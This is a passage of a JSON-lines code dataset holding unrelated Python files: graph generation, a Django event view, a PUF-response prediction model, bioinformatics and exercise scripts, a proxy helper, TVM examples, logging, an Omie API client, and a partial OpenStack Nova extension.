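degree = [3, 3, 3, 1]               # current degrees of vertices 0..3
p = np.array(degree) / sum(degree)  # attachment probabilities
# Vertex 3 is chosen least often; well-connected vertices keep attracting edges.
to_vertices = np.random.choice(range(4), size=2, replace=False, p=p)
print(to_vertices)
```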
'''\n c = 4\n while True:\n yield c\n c += 1\n \n ids = _idgen()\n graph = []\n sierpinski(1,2,3,degree,predicates, graph) \n with open(os.path.join(target_dir, 'sierpinskigraph_%s.txt'%(degree)), 'w') as out_file:\n for triple in graph:\n out_file.write('%s %s %s \\n'%(triple[0], triple[1], triple[2]))\n\nif __name__ == '__main__':\n install_gtgraph()\n download_data()\n unpack_graphs()\n generate_all_sparse_graphs()\n generate_full_graphs()\n generate_worst_case_graphs()\n generate_scale_free_graphs()\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":8743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"405744445","text":"from models import Event, Presence\nfrom django.core.context_processors import csrf\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import Context, loader\nfrom django.core.exceptions import ObjectDoesNotExist\n\ndef eventDetails(request, **args):\n t = loader.get_template('eventdetails.view')\n\n user = request.user\n \n c = { 'event' : None, 'can_delete' : False }\n c.update(csrf(request))\n\n event = None\n if 'id' in args:\n event = Event.objects.get(id = int(args['id']))\n event.loadThreads()\n\n if event:\n c['event'] = event\n c['can_delete'] = can_delete(user, args)\n c['can_attend'] = False\n\n if event and 'delete' in request.POST and can_delete(user, args):\n event.delete()\n return HttpResponseRedirect('/kalender/')\n\n if event and 'present' in request.POST and can_be_present(user, args):\n presence = Presence()\n presence.user = user\n presence.event = event\n presence.save()\n return HttpResponseRedirect('/evenement/%s/' % (event.id))\n \n if event and user.is_authenticated():\n c['can_attend'] = True\n c['attendees'] = [\"%s %s\" % (p.user.first_name, p.user.last_name) for p in Presence.objects.filter(event__id = event.id)]\n\n return HttpResponse(t.render(Context(c)))\n\ndef can_be_present(user, event):\n return user.is_authenticated() and not Event.objects.filter(presence__user__id = user.id)\n\ndef can_delete(user, args):\n try:\n return user.is_authenticated() and Event.objects.filter(acluserevent__user__id = user.id).get(id = int(args['id']))\n except ObjectDoesNotExist:\n return False\n","sub_path":"GameCalendar/eventcontrol.py","file_name":"eventcontrol.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"553916385","text":"import itertools\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom pytorch_ssim import ssim\n\nfrom non_linear.modules.cropped.Cropped_Generator_type1_module import Generator as Generator_Cropped_type1\nfrom non_linear.modules.cropped.Cropped_Generator_type2_module import Generator as Generator_Cropped_type2\nfrom non_linear.modules.normal.Generator_module import Generator\nfrom non_linear.utils.utils import calc_pc, weights_init, calc_ssim\nfrom utils import utils\n\n\nclass GeneratorModel(LightningModule):\n \"\"\"\n DL model for the generator attack. 
After training, the pearson correlation coefficient, structural similarity index\n and fractional hamming distance for each real and predicted response pair of the test set are computed.\n \"\"\"\n\n def __init__(self, hparams, img_size, crop_size, c_bits, denormalize, do_crop, crop_type2, custom_gabor):\n \"\"\"\n Initializes the generator.\n\n :param hparams: hyperparameters that are used for the model\n :param img_size: size of the responses\n :param crop_size: size to which the responses will be cropped if decided to\n :param c_bits: number of bits of a challenge\n :param denormalize: inverse function of the normalization applied to the responses for the DL attack\n :param do_crop: whether to crop the responses\n :param crop_type2: whether to use the cropped generator type 2\n :param custom_gabor: whether to use the second gabor transformation\n \"\"\"\n super().__init__()\n self.hparams = hparams\n self.c_bits = c_bits\n self.denormalize = denormalize\n self.crop = do_crop\n self.img_size = img_size\n self.crop_size = crop_size\n self.custom_gabor = custom_gabor\n\n if do_crop:\n if crop_type2:\n generator = Generator_Cropped_type2(c_bits, self.hparams.gen_ns)\n else:\n generator = Generator_Cropped_type1(c_bits, self.hparams.gen_ns)\n else:\n generator = Generator(c_bits, self.hparams.gen_ns)\n\n self.generator = generator\n self.generator.apply(weights_init)\n\n def gen_loss_function(self, real_response, gen_response):\n \"\"\"\n Loss function of the generator. Uses a same-weighted combination of MSE and the SSIM.\n\n :param real_response: real response of the dataset\n :param gen_response: generated response of the generator\n :return: loss for the prediction\n \"\"\"\n normalized_real = self.denormalize(real_response)\n normalized_gen = self.denormalize(gen_response)\n mse_criterion = nn.MSELoss()\n\n ssim_loss = 1 - ssim(normalized_real, normalized_gen)\n mse_loss = mse_criterion(real_response, gen_response)\n\n return ssim_loss, mse_loss\n\n def training_step(self, batch, batch_idx):\n real_challenge, real_response = batch\n gen_response = self.generator(real_challenge)\n\n ssim_loss, mse_loss = self.gen_loss_function(real_response, gen_response)\n loss = ssim_loss + mse_loss\n\n return {'ssim_loss': ssim_loss,\n 'mse_loss': mse_loss,\n 'loss': loss}\n\n def test_step(self, batch, batch_idx):\n challenge, real_response = batch\n gen_response = self.generator(challenge)\n\n normalized_real = self.denormalize(real_response)\n normalized_gen = self.denormalize(gen_response)\n\n ssims = calc_ssim(normalized_real, normalized_gen, keep_first_dim=True)\n pear_coeffs = calc_pc(real_response, gen_response, keep_first_dim=True)\n\n do_crop_responses = not self.crop\n gabor = lambda real, gen: utils.calc_gabor_fhd(real, gen, do_crop_responses, self.img_size, self.crop_size,\n use_custom=self.custom_gabor).item()\n\n fhds = [gabor(real, gen) for (real, gen) in zip(real_response.cpu(), gen_response.cpu())]\n\n return {'ssim': ssims, 'pc': pear_coeffs, 'fhd': fhds}\n\n def test_epoch_end(self, outputs):\n ssim = torch.cat([output[\"ssim\"] for output in outputs]).flatten().tolist()\n pc = torch.cat([output[\"pc\"] for output in outputs]).flatten().tolist()\n fhd = np.array(list(itertools.chain(*[output[\"fhd\"] for output in outputs]))).flatten().tolist()\n\n return {'FHD': fhd, 'PC': pc, 'SSIM': ssim}\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.generator.parameters(), self.hparams.gen_lr,\n (self.hparams.gen_beta1, self.hparams.gen_beta2))\n return 
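`gen_loss_function` above weights the two terms equally: SSIM becomes a loss as `1 - ssim(...)` on the denormalized images, and MSE is taken on the raw tensors. A standalone check on random data, assuming the `pytorch_ssim` package named in the imports:

```python
import torch
import torch.nn as nn
from pytorch_ssim import ssim

real = torch.rand(4, 1, 64, 64)   # a batch of 4 single-channel "responses"
fake = torch.rand(4, 1, 64, 64)

ssim_loss = 1 - ssim(real, fake)  # 0 when the images are identical
mse_loss = nn.MSELoss()(real, fake)
print(float(ssim_loss + mse_loss))
```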
optimizer\n","sub_path":"non_linear/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"433314386","text":"#!/usr/bin/env python3\n\n# Author: Margaret R. Starostik\n\n# Run with: ./day3-homework_kmer_matcher.py subset.fa droYak2_seq.fa 11 | head -1000 > day3-homework_kmer_matcher.txt\n\n\"\"\"\nUsage: day3-homework_kmer_matcher.py \n\nUses the fasta module to parse FASTA files.\nGenerates a dictionary of query sequences:query sequence.\nGoes through target sequence to find matching kmers between the target sequence and dictionary of query kmers.\nReturns target sequence name, target start, query start, and kmer\n\"\"\"\n\nimport sys\nimport fasta # this is the module we made to parse a FASTA file\n\ntarget_reader = fasta.FASTAReader(open(sys.argv[1]))\nquery_reader = fasta.FASTAReader(open(sys.argv[2]))\nkmer_length = int(sys.argv[3])\n\n# Generate a dictionary with query kmers and their start positions\nkmers = {}\n\nfor ident, sequence in query_reader:\n #print(ident, sequence)\n for i in range(0, len(sequence) - kmer_length):\n kmer = sequence[i:i+kmer_length]\n kmers[kmer] = i\n\n# Find matching kmers between a single query sequence and a database of targets. \nfor ident, sequence in target_reader:\n for i in range(0, len(sequence) - kmer_length):\n chunk = sequence[i:i+kmer_length]\n if chunk in kmers:\n print(ident, i, kmers[chunk], chunk)","sub_path":"day3-homework/day3-homework_kmer_matcher.py","file_name":"day3-homework_kmer_matcher.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"585771458","text":"import sys\n\ntry:\n import autogator\nexcept:\n print('USAGE: python -m autogator (did you forget \"-m\"?)')\n sys.exit()\n\nprint(\"Welcome to AutoGator, the automatic chip interrogator.\")\nprint(\"(C) 2019 by Sequoia Ploeg\")\n\nimport tkinter as tk\nimport autogator.images\nimport PIL.ImageTk\n\nclass Splash(tk.Toplevel):\n def __init__(self, parent):\n tk.Toplevel.__init__(self, parent)\n self.title(\"Splash\")\n self.overrideredirect(True)\n self.geometry(\"400x300\")\n self.update_idletasks()\n width = self.winfo_width()\n height = self.winfo_height()\n x = (self.winfo_screenwidth() // 2) - (width // 2)\n y = (self.winfo_screenheight() // 2) - (height // 2)\n self.geometry('{}x{}+{}+{}'.format(width, height, x, y))\n\n maxsize = (400, 300)\n img_holder = tk.Canvas(self, width=400, height=250)\n img_holder.pack(fill=\"both\", expand=True)\n self.img = autogator.images.get_image_by_name('croc.jpg')\n self.img.thumbnail(maxsize)\n self.img = PIL.ImageTk.PhotoImage(self.img)\n img_holder.create_image(0, 0, image=self.img, anchor=tk.NW)\n\n lbl = tk.Label(self, text='AutoGator')\n lbl.pack(fill='both', expand=True)\n\n ## required to make window show before the program gets to the mainloop\n self.update()\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.withdraw()\n splash = Splash(self)\n\n # Setup stuff goes here\n import os\n import time\n from autogator.ui.program import AutoGatorWindow\n\n # Add location of the DLLs to PATH so that the program can run on any machine\n dll_location = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'dll')\n os.environ['PATH'] = dll_location + os.pathsep + os.environ['PATH']\n\n window = AutoGatorWindow(self)\n self.state('zoomed')\n self.update_idletasks()\n \n # We have finished 
loading, so destroy splash and show window again\n splash.destroy()\n self.deiconify()\n # window.center()\n\nif __name__ == '__main__':\n app = App()\n app.mainloop()","sub_path":"autogator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"51428900","text":"def intersection(arrays):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n\n cache = {}\n intersections = []\n\n for array in arrays:\n for value in array:\n # if value in cache and not in results add tvalue\n if value in cache and value not in intersections:\n intersections.append(value)\n else:\n cache[value] = True\n print(intersections)\n \n return intersections\n\n\nif __name__ == \"__main__\":\n arrays = []\n\n arrays.append(list(range(1000000, 2000000)) + [1, 2, 3])\n arrays.append(list(range(2000000, 3000000)) + [1, 2, 3])\n arrays.append(list(range(3000000, 4000000)) + [1, 2, 3])\n\n print(intersection(arrays))\n","sub_path":"hashtables/ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"516022878","text":"import math\nclass Solution:\n def countPrimeSetBits(self, L, R):\n \"\"\"\n :type L: int\n :type R: int\n :rtype: int\n \"\"\"\n cnt = 0\n primenum = [2, 3, 5, 7, 11, 13, 17,19]\n for i in range(L, R + 1):\n n = self.countBits(i)\n if n in primenum:\n cnt+=1\n return cnt\n def isPrime(self, n):\n if n < 2:\n return False\n if n == 2 or n == 3:\n return True\n for i in range(2, int(math.sqrt(n)+1)):\n if n%i == 0:\n return False\n return True\n def countBits(self, n):\n return bin(n).count('1')\n\n\nres = Solution()\nl = res.countPrimeSetBits(6,10)\nprint(l)","sub_path":"Python/762-1.py","file_name":"762-1.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"326041477","text":"import random\nimport pickle\nimport os\nfrom urllib.parse import unquote, quote\nimport re\n\n\nclass Coder:\n\tdef __init__(self):\n\t\tself.encode_list = [i for i in range(256)]\n\t\trandom.shuffle(self.encode_list)\n\t\tself.decode_list = [0] * 256\n\t\tfor i in range(len(self.encode_list)):\n\t\t\tself.decode_list[self.encode_list[i]] = i\n\n\tdef encode(self, data: bytes): # 接受加密前的二进制\n\t\ts = bytearray()\n\t\tfor i in data:\n\t\t\ts.append(self.encode_list[i])\n\t\treturn s\n\n\tdef decode(self, data: bytearray): # 接受加密后的二进制\n\t\ts = bytearray()\n\t\tfor i in data:\n\t\t\ts.append(self.decode_list[i])\n\t\treturn str(s, encoding='utf-8')\n\n\tdef decode_as_bytes(self, data: bytearray):\n\t\ts = bytearray()\n\t\tfor i in data:\n\t\t\ts.append(self.decode_list[i])\n\t\treturn s\n\n\tdef save_coder(self):\n\t\tf = open('coder.pkl', 'wb+')\n\t\tpickle.dump(self, f)\n\t\tf.close()\n\n\ndef load_coder():\n\tif not os.path.exists('coder.pkl'):\n\t\tassert False, 'coder not exists'\n\tf = open('coder.pkl', 'rb')\n\t_ = pickle.load(f)\n\tf.close()\n\treturn _\n\n\nclass Request:\n\tdef __init__(self, header):\n\t\tself.content = header\n\t\tself.port = -1\n\t\t_ = True\n\t\tif header:\n\t\t\tindexssl = header.split(b\"\\n\")[0].find(b\"CONNECT\")\n\t\t\tif indexssl > -1:\n\t\t\t\thostname = str(header.split(b\"\\n\")[0].split(b\":\")[0].decode())\n\t\t\t\thostname = hostname[indexssl + 8:]\n\t\t\t\tport = 443\n\t\t\t\tssl_flag = True\n\t\t\t\tself.header = header\n\t\t\t\tself.host = 
hostname\n\t\t\t\tself.port = port\n\t\t\t\tself.ssl_flag = ssl_flag\n\t\t\tindex1 = header.find(b\"Host:\")\n\t\t\tindex2 = header.find(b\"GET http\")\n\t\t\tindex3 = header.find(b\"POST http\")\n\t\t\tif index1 > -1:\n\t\t\t\tindexofn = header.find(b\"\\n\", index1)\n\t\t\t\thost = header[index1 + 5:indexofn]\n\t\t\telif index2 > -1 or index3 > -1:\n\t\t\t\thost = header.split(b\"/\")[2]\n\t\t\telse:\n\t\t\t\t_ = False\n\t\t\tif _:\n\t\t\t\thost = str(host.decode().strip(\"\\r\").lstrip())\n\t\t\t\tif len(host.split(\":\")) == 2:\n\t\t\t\t\tport = host.split(\":\")[1]\n\t\t\t\t\thostname = host.split(\":\")[0].strip(\"\")\n\t\t\t\telse:\n\t\t\t\t\tport = 80\n\t\t\t\t\thostname = host.split(\":\")[0].strip(\"\")\n\t\t\t\tssl_flag = False\n\t\t\t\tself.header = header\n\t\t\t\tself.host = hostname\n\t\t\t\tself.port = int(port)\n\t\t\t\tself.ssl_flag = ssl_flag\n\n\nclass Response:\n\tdef __init__(self, _response_str: bytes):\n\t\tself.string = _response_str\n\t\tself.dict = {}\n\t\tself.len = -1\n\t\tself.code = -1\n\t\tself.parse()\n\t\tpass\n\n\t@property\n\tdef content_length(self):\n\t\tif 'Content-Length' in self.string:\n\t\t\treturn\n\t\tpass\n\n\tdef status_code(self, _str):\n\t\t_str = _str.decode()\n\t\t_list = re.split(' ', _str)\n\t\tif len(_list) > 1:\n\t\t\tself.code = _list[1]\n\n\tdef parse(self):\n\t\t_idx = self.string.find(b'Content-Type:')\n\t\t_str = self.string[:_idx]\n\t\tself.status_code(_str)\n\t\t_str = _str.decode()\n\t\t_line_list = re.split('\\r\\n', _str)\n\t\tfor i in _line_list:\n\t\t\tif len(i) >= len('Content-Length:'):\n\t\t\t\tif 'Content-Length:' in i:\n\t\t\t\t\tcontent_length_str_list = re.split(' ', i)\n\t\t\t\t\tif content_length_str_list[-1].isdigit():\n\t\t\t\t\t\t_len = int(content_length_str_list[-1])\n\t\t\t\t\t\tself.len = _len\n\t\treturn\n\n\tdef is_end(self):\n\t\tif self.code in ['304'] and len(self.string) >= 4 and self.string[-4:] == b'\\r\\n\\r\\n':\n\t\t\treturn True\n\t\tif self.len != -1:\n\t\t\tbody_bytes = re.split(b'\\r\\n\\r\\n', self.string)[-1]\n\t\t\tif len(body_bytes) == self.len:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif b'\\r\\n0\\r\\n\\r\\n' in self.string:\n\t\t\treturn True\n\t\tif b'0\\r\\n\\r\\n' in self.string:\n\t\t\treturn True\n\t\tif b'' in self.string:\n\t\t\treturn True\n\t\tif b'Transfer-Encoding' in self.string:\n\t\t\tpass\n\t\treturn False\n\n\nif __name__ == '__main__':\n\trequest = 'GET http://chawdoe.coding.me/http_server/record.html HTTP/1.1\\r\\nHost: clients1.google.com:443\\r\\nProxy-Connection: keep-alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\\r\\n\\r\\n'\n\t# r2 = 'GET http://chawdoe.coding.me:80/http_server/record.html HTTP/1.1\\r\\n'\n\ttry:\n\t\t_ = Request(request)\n\t\tprint(_.method)\n\t\tprint(_.body)\n\t\tprint(_.headers)\n\n\t\t# print(_.path)\n\t\tprint('path:{}'.format(_.path))\n\t# print(_.request)\n\texcept TypeError:\n\t\tpass\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"210579032","text":"# -*-coding:utf-8-*-\nimport tvm\nimport numpy as np\nfrom tvm.contrib import cblas\n\nn = 1024\nl = 128\nm = 235\n# var\nbias = tvm.var('bias', dtype=tvm.float32)\n# Tensor\nA = tvm.placeholder((n, l), name='A')\nB = tvm.placeholder((l, m), name='B')\n# 添加一个额外的函数,这个函数更多可以是自定义的\n# Tensor\n# C = tvm.extern((n, m), [A, B],\n# lambda ins, outs: 
tvm.call_packed('tvm.contrib.cblas.matmul',\n# ins[0], ins[1], outs[0], False, False),\n# name='C')\n# # Tensor\n# D = tvm.compute(C.shape, lambda i, j: C[i, j] + bias, name='D')\n# s = tvm.create_schedule(D.op)\n\n# 另外一种写法\nC = cblas.matmul(A, B)\nD = tvm.compute(C.shape, lambda i, j: C[i, j] + bias, name='D')\ns = tvm.create_schedule(D.op)\n\n# verify the result\nctx = tvm.cpu(0)\n# Module\nf = tvm.build(s, [A, B, D, bias], 'llvm')\n# 为什么不行\n# f = tvm.build(s, [A, B, bias,D], 'llvm')\na = tvm.nd.array(np.random.uniform(size=(n, l)).astype(A.dtype), ctx=ctx)\nb = tvm.nd.array(np.random.uniform(size=(l, m)).astype(B.dtype), ctx=ctx)\nd = tvm.nd.array(np.zeros(shape=(n, m), dtype=D.dtype), ctx=ctx)\nbb = 10.0\nf(a, b, d, bb)\nnp.testing.assert_allclose(\n d.asnumpy(), np.dot(a.asnumpy(), b.asnumpy()) + 10, rtol=1e-5)\nprint(d.shape)\n\n\n@tvm.register_func('tvm.contrib.my_tvm_add_one')\ndef my_tvm_add_one(x, y):\n print('my tvm add one signatures :%s, %s' % (type(x), type(y)))\n tvm.nd.array(x.asnumpy() + 1).copyto(y)\n\n\nA = tvm.placeholder((n,), name='A')\nB = tvm.extern(A.shape, [A],\n lambda ins, outs:\n tvm.call_packed('tvm.contrib.my_tvm_add_one', ins[0], outs[0]),\n name='C')\ns = tvm.create_schedule(B.op)\nf = tvm.build(s, [A, B], 'llvm')\na = tvm.nd.array(np.random.uniform(size=(n,)).astype(A.dtype), ctx=ctx)\nb = tvm.nd.array(np.random.uniform(size=(n,)).astype(B.dtype), ctx=ctx)\nf(a, b)\nnp.testing.assert_allclose(b.asnumpy(), a.asnumpy() + 1, rtol=1e-5)\nprint(b.shape)\n","sub_path":"tvm_handson/tutorial/external_tensor_function.py","file_name":"external_tensor_function.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"625094672","text":"# This class collects and reports error messages\n\nfrom datetime import datetime\nfrom Config import *\nfrom DBPRunFilesS3 import *\n\nclass Log:\n\n\tFATAL = 0\n\tEROR = 1\n\tWARN = 2\n\tINFO = 3\n\tloggers = {}\n\n\tdef getLogger(filesetId):\n\t\tlogger = Log.loggers.get(filesetId)\n\t\tif logger == None:\n\t\t\tlogger = Log(filesetId)\n\t\t\tLog.loggers[filesetId] = logger\n\t\treturn logger\n\n\tdef fatalError(message):\n\t\tlogger = Log.getLogger(\"~\")\n\t\tlogger.message(Log.FATAL, message)\n\t\tconfig = Config()\n\t\tLog.writeLog(config)\n\t\tsys.exit()\n\n\tdef totalErrorCount():\n\t\tcount = 0\n\t\tfor logger in Log.loggers.values():\n\t\t\tcount += logger.errorCount()\n\t\treturn count\n\n\tdef writeLog(config):\n\t\terrors = []\n\t\tfor key in sorted(Log.loggers.keys()):\n\t\t\tlogger = Log.loggers[key]\n\t\t\tfor message in logger.format():\n\t\t\t\terrors.append(message)\n\n\t\tif len(errors) > 0:\n\t\t\terrorDir = config.directory_errors\n\t\t\tpattern = config.filename_datetime \n\t\t\tpath = errorDir + \"Errors.out\"\n\t\t\tprint(\"openErrorReport\", path)\n\t\t\terrorFile = open(path, \"a\", encoding=\"utf-8\")\n\t\t\tfor message in errors:\n\t\t\t\terrorFile.write(message + '\\n')\n\t\t\t\tprint(message, end='\\n')\n\t\t\terrorFile.close()\n\t\t\tDBPRunFilesS3.uploadFile(config, path)\n\t\tprint(\"Num Errors \", len(errors))\n\n\n\tdef addPreValidationErrors(messages):\n\t\tfor (filesetId, errors) in messages.items():\n\t\t\tlogger = Log.getLogger(filesetId)\n\t\t\tfor error in errors:\n\t\t\t\tlogger.messages.append((Log.EROR, error))\t\n\n\n\tdef __init__(self, filesetId):\n\t\tself.filesetId = filesetId\n\t\tself.messages = []\n\n#\tdef hasMessages(self):\n#\t\treturn len(self.messages) > 0\n\n\tdef 
errorCount(self):\n\t\tcount = 0;\n\t\tfor msg in self.messages:\n\t\t\tif msg[0] == Log.EROR or msg[0] == Log.FATAL:\n\t\t\t\tcount += 1\n\t\treturn count\n\n\tdef message(self, level, text):\n\t\tself.messages.append((level, text))\n\n\tdef messageTuple(self, messageTuple):\n\t\tself.messages.append(messageTuple)\n\n\tdef invalidFileExt(self, filename):\n\t\tself.messages.append((Log.EROR, \"/%s has an invalid file ext.\" % (filename)))\n\n\tdef missingBibleIds(self):\n\t\tself.messages.append((Log.EROR, \"bibleId is not in LPTS.\"))\n\n\tdef missingFilesetIds(self):\n\t\tself.messages.append((Log.EROR, \"filesetId is not in LPTS record.\"))\n\n\tdef damIdStatus(self, stockNo, status):\n\t\tself.messages.append((Log.WARN, \"LPTS %s has status = %s.\" % (stockNo, status)))\n\n\tdef requiredFields(self, stockNo, fieldName):\n\t\tself.messages.append((Log.EROR, \"LPTS %s field %s is required.\" % (stockNo, fieldName)))\n\n\tdef suggestedFields(self, stockNo, fieldName):\n\t\tself.messages.append((Log.WARN, \"LPTS %s field %s is missing.\" % (stockNo, fieldName)))\n\n\tdef invalidValues(self, stockNo, fieldName, fieldValue):\n\t\tself.messages.append((Log.EROR, \"in %s %s has invalid value '%s'.\" % (stockNo, fieldName, fieldValue)))\n\n\tdef fileErrors(self, fileList):\n\t\tfor file in fileList:\n\t\t\tif len(file.errors) > 0:\n\t\t\t\tself.messages.append((Log.EROR, \"%s/%s %s.\" % (self.filesetId, file.file, \", \".join(file.errors))))\n\n\tdef format(self):\n\t\tlevelMap = { Log.FATAL: \"FATAL\", Log.EROR: \"EROR\", Log.WARN: \"WARN\", Log.INFO: \"INFO\"}\n\t\toutput = []\n\t\tfor (level, msg) in self.messages:\n\t\t\tlevelMsg = levelMap.get(level)\n\t\t\toutput.append(\"%s %s %s\" % (levelMsg, self.filesetId, msg))\n\t\treturn output\n\n\nif (__name__ == '__main__'):\n\tconfig = Config()\n\terror = Log.getLogger(\"ENGESVN2DA\")\n\terror.message(Log.INFO, \"First message\")\n\terror.messageTuple((Log.WARN, \"Second message\"))\n\terror.invalidFileExt(\"MyFilename\")\n\terror.missingBibleIds()\n\terror.missingFilesetIds()\n\terror.requiredFields(\"aStockNo\", \"aFieldName\")\n\terror.suggestedFields(\"aStockNo\", \"aFieldName\")\n\terror.invalidValues(\"afieldName\", \"aFieldValue\")\n\tLog.writeLog(config)\n\n","sub_path":"load/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221266391","text":"import json\n\nimport requests\n\n\nclass ApiOmie:\n def __init__(self, app_key, app_secret):\n self.APP_KEY = app_key\n self.APP_SECRET = app_secret\n\n def request(self, url, call, params=None):\n if params is None:\n params = {}\n data = {\n 'app_key': self.APP_KEY,\n 'app_secret': self.APP_SECRET,\n 'call': call,\n 'param': [params]\n }\n\n header = {\n 'Content-type': \"application/json\"\n }\n\n r = requests.post(\n url=url,\n data=json.dumps(data),\n headers=header\n )\n\n return r\n\n def calc_retencao(self, j: json):\n total = 0\n if \"retem_ir\" in j:\n if j[\"retem_ir\"] == \"S\":\n total += j[\"valor_ir\"]\n if \"retem_cofins\" in j:\n if j[\"retem_cofins\"] == \"S\":\n total += j[\"valor_cofins\"]\n if \"retem_inss\" in j:\n if j[\"retem_inss\"] == \"S\":\n total += j[\"valor_inss\"]\n if \"retem_csll\" in j:\n if j[\"retem_csll\"] == \"S\":\n total += j[\"valor_csll\"]\n if \"retem_iss\" in j:\n if j[\"retem_iss\"] == \"S\":\n total += j[\"valor_iss\"]\n if \"retem_pis\" in j:\n if j[\"retem_pis\"] == \"S\":\n total += j[\"valor_pis\"]\n return 
total\n","sub_path":"OmieAPI/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"629180834","text":"# Copyright 2011 GridCentric Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\n\"\"\"Handles all requests relating to GridCentric functionality.\"\"\"\nimport random\n\nfrom nova import compute\nfrom nova.compute import task_states\nfrom nova.compute import vm_states\nfrom nova import exception\nfrom nova.db import base\nfrom nova import quota\nfrom nova.openstack.common import log as logging\nfrom nova.openstack.common import rpc\nfrom nova import utils\nfrom oslo.config import cfg\n\nLOG = logging.getLogger('nova.gridcentric.api')\nCONF = cfg.CONF\n\ngridcentric_api_opts = [\n cfg.StrOpt('gridcentric_topic',\n default='gridcentric',\n help='the topic gridcentric nodes listen on') ]\nCONF.register_opts(gridcentric_api_opts)\n\nclass API(base.Base):\n \"\"\"API for interacting with the gridcentric manager.\"\"\"\n\n def __init__(self, **kwargs):\n super(API, self).__init__(**kwargs)\n self.compute_api = compute.API()\n\n def get(self, context, instance_uuid):\n \"\"\"Get a single instance with the given instance_uuid.\"\"\"\n rv = self.db.instance_get_by_uuid(context, instance_uuid)\n return dict(rv.iteritems())\n\n def _cast_gridcentric_message(self, method, context, instance_uuid, host=None,\n params=None):\n \"\"\"Generic handler for RPC casts to gridcentric.
This does not block for a response.\n\n :param params: Optional dictionary of arguments to be passed to the\n gridcentric worker\n\n :returns: None\n \"\"\"\n\n if not params:\n params = {}\n if not host:\n instance = self.get(context, instance_uuid)\n host = instance['host']\n if not host:\n queue = CONF.gridcentric_topic\n else:\n queue = rpc.queue_get_for(context, CONF.gridcentric_topic, host)\n\n params['instance_uuid'] = instance_uuid\n kwargs = {'method': method, 'args': params}\n rpc.cast(context, queue, kwargs)\n\n def _acquire_addition_reservation(self, context, instance):\n # Check the quota to see if we can launch a new instance.\n instance_type = instance['instance_type']\n\n # check against metadata\n metadata = self.db.instance_metadata_get(context, instance['uuid'])\n self.compute_api._check_metadata_properties_quota(context, metadata)\n # Grab a reservation for a single instance\n max_count, reservations = self.compute_api._check_num_instances_quota(context,\n instance_type,\n 1,\n 1)\n return reservations\n\n def _acquire_subtraction_reservation(self, context, instance):\n return quota.QUOTAS.reserve(context, instances= -1, ram= -instance['memory_mb'],\n cores= -instance['vcpus'])\n\n def _commit_reservation(self, context, reservations):\n quota.QUOTAS.commit(context, reservations)\n\n def _rollback_reservation(self, context, reservations):\n quota.QUOTAS.rollback(context, reservations)\n\n def _copy_instance(self, context, instance_uuid, new_name, launch=False, new_user_data=None, security_groups=None):\n # (dscannell): Basically we want to copy all of the information from\n # instance with id=instance_uuid into a new instance. This is because we\n # are basically \"cloning\" the vm as far as all the properties are\n # concerned.\n\n instance_ref = self.db.instance_get_by_uuid(context, instance_uuid)\n image_ref = instance_ref.get('image_ref', '')\n if image_ref == '':\n image_ref = instance_ref.get('image_id', '')\n\n if launch:\n metadata = {'launched_from':'%s' % (instance_ref['uuid'])}\n else:\n metadata = {'blessed_from':'%s' % (instance_ref['uuid'])}\n\n instance = {\n 'reservation_id': utils.generate_uid('r'),\n 'image_ref': image_ref,\n 'vm_state': vm_states.BUILDING,\n 'state_description': 'halted',\n 'user_id': context.user_id,\n 'project_id': context.project_id,\n 'launch_time': '',\n 'instance_type_id': instance_ref['instance_type_id'],\n 'memory_mb': instance_ref['memory_mb'],\n 'vcpus': instance_ref['vcpus'],\n 'root_gb': instance_ref['root_gb'],\n 'ephemeral_gb': instance_ref['ephemeral_gb'],\n 'display_name': new_name,\n 'hostname': utils.sanitize_hostname(new_name),\n 'display_description': instance_ref['display_description'],\n 'user_data': new_user_data or '',\n 